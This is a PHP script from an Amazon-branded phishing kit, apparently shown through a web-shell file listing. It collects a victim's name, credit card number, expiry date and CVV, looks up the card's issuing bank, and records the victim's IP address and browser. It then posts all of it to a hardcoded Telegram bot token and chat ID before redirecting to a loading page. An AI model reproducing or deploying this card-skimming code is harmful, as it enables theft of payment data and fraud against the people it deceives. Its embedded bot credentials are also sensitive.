%PDF- %PDF-
| Direktori : /home/gachan/www/bannera5ycws/get2/www.amazon.com/ap/ |
| Current File : /home/gachan/www/bannera5ycws/get2/www.amazon.com/ap/send-cc.php |
<?php
require './script/cc_type.php';
require './script/antibot.php';
require './script/antibot.php';
require './script/antibot.php';
$ip = getenv("REMOTE_ADDR");
$cc_num = $_POST['cc_num'];
$cc_type = getCCType($cc_num);
$bankInfo = getBankInfo($cc_num);
$bankName = isset($bankInfo['bank']['name']) ? $bankInfo['bank']['name'] : "Unknown";
$cardLevel = isset($bankInfo['brand']) ? $bankInfo['brand'] : "Unknown"; // Card level (e.g., Platinum, Gold)
$country = isset($bankInfo['country']['name']) ? $bankInfo['country']['name'] : "Unknown";
function getBankInfo($cc_num) {
$bin = substr($cc_num, 0, 6); // First 6 digits of the card
$url = "https://lookup.binlist.net/{$bin}";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Version: 3']);
$response = curl_exec($ch);
curl_close($ch);
return json_decode($response, true);
}
$hostname = gethostbyaddr($ip);
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message = "------------------------AMAZON-CC-----------------------------\n";
$message .= "Name : ".$_POST['name']."\n";
$message .= "CC Number: ".$cc_num."\n";
$message .= "EXP : ".$_POST['exp']."\n";
$message .= "CVV : ".$_POST['cvv']."\n";
$message .= "-------------------------Info-CC ----------------------------\n";
$message .= "Type : ".$cc_type."\n";
$message .= "Level : ".$cardLevel."\n";
$message .= "Bank : ".$bankName."\n";
$message .= "Country : ".$country."\n";
$message .= "------------------------IP-----------------------------\n";
$message .= "From : ".$ip."\n";
$message .= "Agent : ".$userAgent."\n";
$message .= "-----------------------------------------------------\n";
$website="https://api.telegram.org/bot7415045422:AAHuhkri94WTWonM0NGrxY9HY5jz_rePQ0A";
$chatId=-4266187998; //Receiver Chat Id
$params=[
'chat_id'=>'-4266187998',
'text'=>$message,
'parse_mode'=>'html'
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
sleep(5);
header("Location: loading.php");
?>